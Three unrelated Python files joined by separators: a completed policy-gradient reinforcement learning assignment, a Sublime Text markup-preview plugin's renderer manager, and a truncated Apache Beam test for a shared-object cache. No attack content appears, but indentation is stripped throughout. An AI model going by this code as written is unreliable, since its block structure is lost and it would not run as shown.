Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
if self.reward_to_go:
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}: discount each reward relative to timestep t.
sums = [
[np.sum([(self.gamma ** idx) * reward for idx, reward in enumerate(path[startind:])])
for startind in range(len(path))]
for path in re_n]
q_n = np.concatenate(sums)
else:
# Q_t = Ret(tau): every timestep in a path gets the same total discounted return.
sums = [np.repeat(
np.sum([(self.gamma ** idx) * reward for idx, reward in enumerate(path)]),
len(path))
for path in re_n]
q_n = np.concatenate(sums)
return q_n
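# Illustrative check (not part of the original code): with gamma = 0.5 and a single
# path of rewards [1, 1, 1], reward_to_go=False gives Ret(tau) = 1 + 0.5 + 0.25 = 1.75
# at every timestep, so q_n = [1.75, 1.75, 1.75]; reward_to_go=True gives
# q_n = [1.75, 1.5, 1.0], since Q_t only sums rewards from timestep t onwards.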
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.)
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no:ob_no}) # YOUR CODE HERE
b_n = b_n - np.mean(b_n)
std = np.std(b_n)
if std != 0:
b_n /= std
stdq = np.std(q_n)
if stdq != 0:
b_n *= stdq
b_n += np.mean(q_n)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n -= np.mean(adv_n)
std = np.std(adv_n)
if std != 0:
adv_n /= std
return q_n, adv_n
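# Illustrative check (not part of the original code): normalizing adv_n = [2, 4, 6]
# subtracts the mean (4) and divides by the std (~1.633), giving roughly
# [-1.22, 0.0, 1.22] -- zero mean and unit standard deviation, which empirically
# lowers the variance of the policy gradient estimate.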
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
target_n = q_n - np.mean(q_n)
std = np.std(target_n)
if std != 0:
target_n /= std
self.sess.run(self.baseline_update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_adv_n:target_n})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
#ob_no, ac_na, q_n, adv_n
# pre_loss = self.sess.run(self.loss, feed_dict=dic)
# print(pre_loss)
ac_na_reshaped = np.reshape(ac_na, [ac_na.shape[0], self.ac_dim])
if self.discrete:
dic={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n}
self.sess.run(self.update_op, feed_dict=dic)
else:
dic={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na_reshaped, self.sy_adv_n: adv_n}
self.sess.run(self.update_op, feed_dict=dic)
#post_loss = self.sess.run(self.loss, feed_dict=dic)
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=2)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
train_func()
#p = Process(target=train_func, args=tuple())
#p.start()
#processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
#p.join()
#for p in processes:
#p.join()
if __name__ == "__main__":
main()
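# Example invocations (illustrative only; the environment names are whatever Gym
# environments you have installed, they are not provided by this script):
#   python <this_file>.py CartPole-v0 -n 100 -b 1000 -e 3 -dna --exp_name sb_no_rtg_dna
#   python <this_file>.py CartPole-v0 -n 100 -b 1000 -e 3 -rtg --exp_name sb_rtg_na
#   python <this_file>.py HalfCheetah-v2 -ep 150 --discount 0.9 -n 100 -b 10000 -lr 0.005 -rtg --nn_baseline
# Per-seed results are written under data/<exp_name>_<env_name>_<timestamp>/<seed>/.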
|
RendererManager.py
|
"""
Copyright (c) 2013 Timon Wong
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sublime
import base64
import imp
import inspect
import mimetypes
import os
import re
import sys
import tempfile
import threading
from time import time
from . import log, LibraryPathManager
from .Setting import Setting
from .Common import entities_unescape, Singleton, RWLock, Future, PY3K
# HACK: Make sure required Renderers package load first
exec('from .Renderers import base_renderer')
if PY3K:
from urllib.request import url2pathname
from urllib.parse import urlparse
getcwd = os.getcwd
else:
from urllib import url2pathname
from urlparse import urlparse
getcwd = os.getcwdu
__file__ = os.path.normpath(os.path.abspath(__file__))
__path__ = os.path.dirname(__file__)
LibraryPathManager.add_search_path(os.path.dirname(sys.executable))
LibraryPathManager.add_search_path(os.path.join(__path__, 'libs'))
LibraryPathManager.add_search_path(os.path.join(__path__, 'Renderers', 'libs'))
if PY3K:
LibraryPathManager.add_search_path(os.path.join(__path__, 'Renderers', 'libs', 'python3'))
else:
LibraryPathManager.add_search_path(os.path.join(__path__, 'Renderers', 'libs', 'python2'))
from bottle import template
# Test filesystem case sensitivity
# http://stackoverflow.com/questions/7870041/check-if-file-system-is-case-insensitive-in-python
g_fs_case_sensitive = True
def check_filesystem_case_sensitivity():
global g_fs_case_sensitive
fd, path = tempfile.mkstemp()
if os.path.exists(path.upper()):
g_fs_case_sensitive = False
else:
g_fs_case_sensitive = True
os.close(fd)
os.remove(path)
check_filesystem_case_sensitivity()
def filesystem_path_equals(path1, path2):
if g_fs_case_sensitive:
return path1 == path2
else:
return path1.lower() == path2.lower()
PathCreateFromUrlW = None
if sys.platform == 'win32':
import ctypes
def run():
global PathCreateFromUrlW
shlwapi = ctypes.windll.LoadLibrary('Shlwapi.dll')
PathCreateFromUrlW = shlwapi.PathCreateFromUrlW
PathCreateFromUrlW.restype = ctypes.HRESULT
PathCreateFromUrlW.argtypes = [
ctypes.c_wchar_p,
ctypes.c_wchar_p,
ctypes.POINTER(ctypes.c_uint32),
ctypes.c_uint32,
]
run()
def file_uri_to_path(uri):
if PathCreateFromUrlW is not None:
path_len = ctypes.c_uint32(260)
path = ctypes.create_unicode_buffer(path_len.value)
PathCreateFromUrlW(uri, path, ctypes.byref(path_len), 0)
return path.value
else:
return url2pathname(urlparse(uri).path)
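# Illustrative behaviour (inferred from the code above, not an exhaustive spec): on
# Windows, file_uri_to_path('file:///C:/docs/readme.md') goes through PathCreateFromUrlW
# and yields something like 'C:\\docs\\readme.md'; on other platforms it falls back to
# url2pathname, so 'file:///home/user/readme.md' yields '/home/user/readme.md'.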
class RenderedMarkupCacheEntry(dict):
__getattr__ = dict.__getitem__
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __init__(self, fullpath, html_part=''):
self.disconnected = False
revivable_key = base64.b64encode(fullpath.encode('utf-8')).decode('ascii')
filename = os.path.basename(fullpath)
dirname = os.path.dirname(fullpath)
self['revivable_key'] = revivable_key
self['filename'] = filename
self['dirname'] = dirname
self['timestamp'] = str(time())
self['html_part'] = html_part
self['__deepcopy__'] = self.__deepcopy__
def __deepcopy__(self, memo={}):
return self.copy()
@Singleton
class RenderedMarkupCache(object):
def __init__(self):
self.rwlock = RWLock()
self.cache = {}
def exists(self, buffer_id):
with self.rwlock.readlock:
return buffer_id in self.cache
def get_entry(self, buffer_id):
with self.rwlock.readlock:
if buffer_id in self.cache:
return self.cache[buffer_id]
return None
def set_entry(self, buffer_id, entry):
with self.rwlock.writelock:
self.cache[buffer_id] = entry
def clean(self):
with self.rwlock.writelock:
self.cache.clear()
class WorkerQueueItem(object):
def __init__(self, buffer_id, timestamp=0, fullpath='untitled', lang='', text=''):
self.buffer_id = buffer_id
self.timestamp = timestamp
self.fullpath = fullpath or 'untitled'
self.lang = lang
self.text = text
def __eq__(self, other):
# Queue items are deduplicated by buffer id.
return self.buffer_id == other.buffer_id
def __hash__(self):
return hash(self.buffer_id)
class RendererWorker(threading.Thread):
def __init__(self, mutex):
threading.Thread.__init__(self)
self.cond = threading.Condition(mutex)
self.que = set()
self.stopping = False
def enqueue(self, buffer_id, fullpath, lang, text, immediate=False):
item = WorkerQueueItem(buffer_id, fullpath=fullpath, lang=lang, text=text)
if immediate: # Render in the main thread
self._run_queued_item(item)
else:
with self.cond:
self.que.add(item)
self.cond.notify()
def _run_queued_item(self, item):
try:
# Render text and save to cache
html_part = RendererManager.render_text(item.fullpath, item.lang, item.text)
entry = RenderedMarkupCacheEntry(item.fullpath, html_part=html_part)
RenderedMarkupCache.instance().set_entry(item.buffer_id, entry)
except NotImplementedError:
pass
except Exception as err:
log.exception(err)
def run(self):
while True:
with self.cond:
self.cond.wait()
if self.stopping:
break
if len(self.que) == 0:
continue
for item in list(self.que):
self._run_queued_item(item)
self.que.clear()
def stop(self):
self.stopping = True
with self.cond:
self.cond.notify()
self.join()
class RendererManager(object):
MUTEX = threading.Lock()
WORKER = RendererWorker(MUTEX)
LANG_RE = re.compile(r'^[^\s]+(?=\s+)')
RENDERERS = []
@classmethod
def any_available_renderer(cls, filename, lang):
# filename may be None, so guard against it
filename = filename or ""
for renderer_classname, renderer in cls.RENDERERS:
if renderer.is_enabled(filename, lang):
return True
return False
@classmethod
def any_available_renderer_for_view(cls, view):
filename = view.file_name()
lang = cls.get_lang_by_scope_name(view.scope_name(0))
return cls.any_available_renderer(filename, lang)
@classmethod
def get_lang_by_scope_name(cls, scope_name):
m = cls.LANG_RE.search(scope_name)
if m is None:
lang = ""
else:
lang = m.group(0).lower()
return lang
@classmethod
def render_text(cls, fullpath, lang, text, post_process_func=None):
"""Render text (markups) as HTML"""
if post_process_func is None:
post_process_func = cls.render_text_postprocess
filename = os.path.basename(fullpath)
for renderer_classname, renderer in cls.RENDERERS:
try:
if renderer.is_enabled(filename, lang):
rendered_text = renderer.render(text, filename=filename)
return post_process_func(rendered_text, fullpath)
except:
log.exception('Exception occurred while rendering using %s', renderer_classname)
raise NotImplementedError()
IMG_TAG_RE = re.compile(r'(<img [^>]*src=")([^"]+)("[^>]*>)', re.DOTALL | re.IGNORECASE | re.MULTILINE)
@classmethod
def render_text_postprocess(cls, rendered_text, filename):
dirname = os.path.dirname(filename)
def encode_image_path(m):
url = m.group(2)
o = urlparse(url)
if (len(o.scheme) > 0 and o.scheme != 'file') or url.startswith('//'):
# Is a valid url, returns original text
return m.group(0)
# or local file (maybe?)
if o.scheme == 'file':
local_path = file_uri_to_path(url)
else:
local_path = os.path.normpath(os.path.join(dirname, entities_unescape(url)))
encoded_path = base64.urlsafe_b64encode(local_path.encode('utf-8')).decode('ascii')
return m.group(1) + '/local/' + encoded_path + m.group(3)
return cls.IMG_TAG_RE.sub(encode_image_path, rendered_text)
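# Illustrative example (an assumption, not taken from the project docs): for a buffer saved
# at /home/user/notes/page.md, a rendered fragment like '<img src="images/figure.png">' has
# its src rewritten to '/local/<urlsafe-base64 of /home/user/notes/images/figure.png>',
# letting the preview server serve the image from disk, while http(s) URLs are left untouched.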
@classmethod
def render_text_postprocess_exporting(cls, rendered_text, filename):
# Embedding images
dirname = os.path.dirname(filename)
def encode_image_path(m):
url = m.group(2)
o = urlparse(url)
if (len(o.scheme) > 0 and o.scheme != 'file') or url.startswith('//'):
# Is a valid url, returns original text
return m.group(0)
# or local file (maybe?)
if o.scheme == 'file':
local_path = file_uri_to_path(url)
else:
local_path = os.path.normpath(os.path.join(dirname, entities_unescape(url)))
mime_type, _ = mimetypes.guess_type(os.path.basename(local_path))
if mime_type is not None:
with open(local_path, 'rb') as image_file:
    data_uri = base64.b64encode(image_file.read())
image_tag_src = 'data:%s;base64,%s' % (mime_type, data_uri.decode('ascii'))
else:
image_tag_src = '[Invalid mime type]'
return m.group(1) + image_tag_src + m.group(3)
return cls.IMG_TAG_RE.sub(encode_image_path, rendered_text)
@classmethod
def render_view_as_html(cls, view):
fullpath = view.file_name() or ''
lang = RendererManager.get_lang_by_scope_name(view.scope_name(0))
text = view.substr(sublime.Region(0, view.size()))
html_part = RendererManager.render_text(
fullpath, lang, text,
post_process_func=cls.render_text_postprocess_exporting)
setting = Setting.instance()
return template(setting.export_options['template_name'],
mathjax_enabled=setting.mathjax_enabled,
filename=os.path.basename(fullpath),
dirname=os.path.dirname(fullpath),
html_part=html_part)
@classmethod
def enqueue_view(cls, view, only_exists=False, immediate=False):
buffer_id = view.buffer_id()
if only_exists and not RenderedMarkupCache.instance().exists(buffer_id):
return
region = sublime.Region(0, view.size())
text = view.substr(region)
lang = cls.get_lang_by_scope_name(view.scope_name(0))
cls.WORKER.enqueue(buffer_id, view.file_name(), lang, text, immediate=immediate)
@classmethod
def enqueue_buffer_id(cls, buffer_id, only_exists=False, immediate=False):
"""Render by view id immediately and return result as HTML"""
def query_valid_view(buffer_id):
"""Query a valid view by buffer id"""
for window in sublime.windows():
for view in window.views():
if view.buffer_id() == buffer_id:
return view
return None
valid_view = query_valid_view(buffer_id)
if valid_view is not None:
RendererManager.enqueue_view(valid_view, only_exists=only_exists, immediate=immediate)
return RenderedMarkupCache.instance().get_entry(buffer_id)
@classmethod
def revive_buffer(cls, revivable_key):
# Wait until all renderers finished initializing
if not cls.STARTED:
return None
revivable_key = base64.b64decode(revivable_key).decode('utf-8')
for window in sublime.windows():
for view in window.views():
file_name = view.file_name()
# NOTE: file_name is None for console views, so we just
# skip them
if file_name is None:
continue
if filesystem_path_equals(file_name, revivable_key):
return view.buffer_id()
return None
@classmethod
def _import_module(cls, name, path, prefix=None):
if prefix and isinstance(prefix, str):
modname = "%s.%s" % (prefix, name)
else:
modname = name
f, filename, etc = imp.find_module(name, [path])
mod = imp.load_module(modname, f, filename, etc)
return mod
@classmethod
def _load_renderer(cls, renderers, path, name):
prefix = 'OmniMarkupLib.Renderers'
if PY3K:
prefix = 'OmniMarkupPreviewer.' + prefix
try:
mod = cls._import_module(name, path, prefix)
# Get classes
classes = inspect.getmembers(mod, inspect.isclass)
for classname, classtype in classes:
# Register renderer into manager
if hasattr(classtype, 'IS_VALID_RENDERER__'):
try:
log.info('Loaded renderer: %s', classname)
# Add both classname and its instance
renderers.append((classname, classtype()))
except:
log.exception('Failed to load renderer: %s', classname)
except:
log.exception('Failed to load renderer module: %s.%s', prefix, name)
@classmethod
def load_renderers(cls, excludes):
renderers = []
with cls.MUTEX:
# Change the current directory to that of the module. It's not safe to just
# add the modules directory to sys.path, as that won't accept unicode paths
# on Windows
renderers_path = os.path.join(__path__, 'Renderers/')
oldpath = getcwd()
os.chdir(os.path.join(__path__, '..'))
try:
module_list = [f for f in os.listdir(renderers_path)
if f.endswith('Renderer.py')]
# Load each renderer
for module_file in module_list:
name = module_file[:-3]
if name in excludes:
continue
cls._load_renderer(renderers, renderers_path, name)
finally:
# Restore the current directory
os.chdir(oldpath)
cls.RENDERERS = renderers
OLD_IGNORED_RENDERERS = set()
@classmethod
def on_setting_changing(cls, setting):
cls.OLD_IGNORED_RENDERERS = setting.ignored_renderers.copy()
@classmethod
def on_setting_changed(cls, setting):
# Unload ignored renderers
if cls.OLD_IGNORED_RENDERERS != setting.ignored_renderers:
# Reload renderers, of course
cls.load_renderers(setting.ignored_renderers)
for renderer_classname, renderer in cls.RENDERERS:
key = 'renderer_options-' + renderer_classname
try:
renderer_options = setting.get_setting(key, {})
renderer.load_settings(renderer_options, setting)
except:
log.exception('Error on setting renderer options for %s', renderer_classname)
WAIT_TIMEOUT = 1.0
STARTED = True
RENDERERS_LOADER_THREAD = None
@classmethod
def ensure_started(cls):
if cls.RENDERERS_LOADER_THREAD is not None:
try:
cls.RENDERERS_LOADER_THREAD.join(cls.WAIT_TIMEOUT)
except:
pass
return cls.STARTED
@classmethod
def start(cls):
cls.STARTED = False
setting = Setting.instance()
setting.subscribe('changing', cls.on_setting_changing)
setting.subscribe('changed', cls.on_setting_changed)
cls.WORKER.start()
cls.on_setting_changing(setting)
def _start():
cls.load_renderers(setting.ignored_renderers)
f = Future(lambda: cls.on_setting_changed(setting))
sublime.set_timeout(f, 0)
f.result()
cls.RENDERERS_LOADER_THREAD = None
cls.STARTED = True
cls.RENDERERS_LOADER_THREAD = threading.Thread(target=_start)
# Postpone the renderer loader thread, otherwise it breaks loading of other plugins.
sublime.set_timeout(lambda: cls.RENDERERS_LOADER_THREAD.start(), 0)
@classmethod
def stop(cls):
cls.STARTED = False
cls.WORKER.stop()
if cls.RENDERERS_LOADER_THREAD is not None:
try:
cls.RENDERERS_LOADER_THREAD.join()
except:
pass
|
shared_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test for Shared class."""
import gc
import threading
import time
import unittest
from apache_beam.utils import shared
class Count(object):
def __init__(self):
self._lock = threading.Lock()
self._total = 0
self._active = 0
def add_ref(self):
with self._lock:
self._total += 1
self._active += 1
def release_ref(self):
with self._lock:
self._active -= 1
def get_active(self):
with self._lock:
return self._active
def get_total(self):
with self._lock:
return self._total
class Marker(object):
def __init__(self, count):
self._count = count
self._count.add_ref()
def __del__(self):
self._count.release_ref()
class NamedObject(object):
def __init__(self, name):
self._name = name
def get_name(self):
return self._name
class Sequence(object):
def __init__(self):
self._sequence = 0
def make_acquire_fn(self):
# Every time acquire_fn is called, increase the sequence number and return
# a NamedObject with that sequence number.
def acquire_fn():
self._sequence += 1
return NamedObject('sequence%d' % self._sequence)
return acquire_fn
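# A minimal usage sketch of the API exercised by these tests (illustrative only: the
# function and object names are made up; the real entry point is shared.Shared().acquire):
def _example_usage():
    handle = shared.Shared()
    def load_model():
        # Stands in for constructing an expensive resource exactly once.
        return NamedObject('expensive_object')
    # acquire() runs load_model only if no cached value is alive; otherwise it hands back
    # the shared, already-constructed object -- the behaviour the tests below verify.
    obj = handle.acquire(load_model)
    return obj.get_name()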
class SharedTest(unittest.TestCase):
def testKeepalive(self):
count = Count()
shared_handle = shared.Shared()
other_shared_handle = shared.Shared()
def dummy_acquire_fn():
return None
def acquire_fn():
return Marker(count)
p1 = shared_handle.acquire(acquire_fn)
self.assertEqual(1, count.get_total())
self.assertEqual(1, count.get_active())
del p1
gc.collect()
# Won't be garbage collected, because of the keep-alive
self.assertEqual(1, count.get_active())
# Reacquire.
p2 = shared_handle.acquire(acquire_fn)
self.assertEqual(1, count.get_total()) # No reinitialisation.
self.assertEqual(1, count.get_active())
# Get rid of the keepalive
other_shared_handle.acquire(dummy_acquire_fn)
del p2
gc.collect()
self.assertEqual(0, count.get_active())
def testMultiple(self):
count = Count()
shared_handle = shared.Shared()
other_shared_handle = shared.Shared()
def dummy_acquire_fn():
return None
def acquire_fn():
return Marker(count)
p = shared_handle.acquire(acquire_fn)
other_shared_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
self.assertEqual(1, count.get_total())
self.assertEqual(1, count.get_active())
del p
gc.collect()
self.assertEqual(0, count.get_active())
# Shared value should be garbage collected.
# Acquiring multiple times only results in one initialisation
p1 = shared_handle.acquire(acquire_fn)
# Since shared value was released, expect a reinitialisation.
self.assertEqual(2, count.get_total())
self.assertEqual(1, count.get_active())
p2 = shared_handle.acquire(acquire_fn)
self.assertEqual(2, count.get_total())
self.assertEqual(1, count.get_active())
other_shared_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
# Check that shared object isn't destroyed if there's still a reference to
# it.
del p2
gc.collect()
self.assertEqual(1, count.get_active())
del p1
gc.collect()
self.assertEqual(0, count.get_active())
def testConcurrentCallsDeduped(self):
# Test that only one among many calls to acquire will actually run the
# initialisation function.
count = Count()
shared_handle = shared.Shared()
other_shared_handle = shared.Shared()
refs = []
ref_lock = threading.Lock()
def dummy_acquire_fn():
return None
def acquire_fn():
time.sleep(1)
return Marker(count)
def thread_fn():
p = shared_handle.acquire(acquire_fn)
with ref_lock:
refs.append(p)
threads = []
for _ in range(100):
t = threading.Thread(target=thread_fn)
threads.append(t)
t.start()
for t in threads:
t.join()
self.assertEqual(1, count.get_total())
self.assertEqual(1, count.get_active())
other_shared_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
with ref_lock:
del refs[:]
gc.collect()
self.assertEqual(0, count.get_active())
def testDifferentObjects(self):
sequence = Sequence()
def dummy_acquire_fn():
return None
first_handle = shared.Shared()
second_handle = shared.Shared()
dummy_handle = shared.Shared()
f1 = first_handle.acquire(sequence.make_acquire_fn())
s1 = second_handle.acquire(sequence.make_acquire_fn())
self.assertEqual('sequence1', f1.get_name())
self.assertEqual('sequence2', s1.get_name())
f2 = first_handle.acquire(sequence.make_acquire_fn())
s2 = second_handle.acquire(sequence.make_acquire_fn())
# Check that the repeated acquisitions return the earlier objects
self.assertEqual('sequence1', f2.get_name())
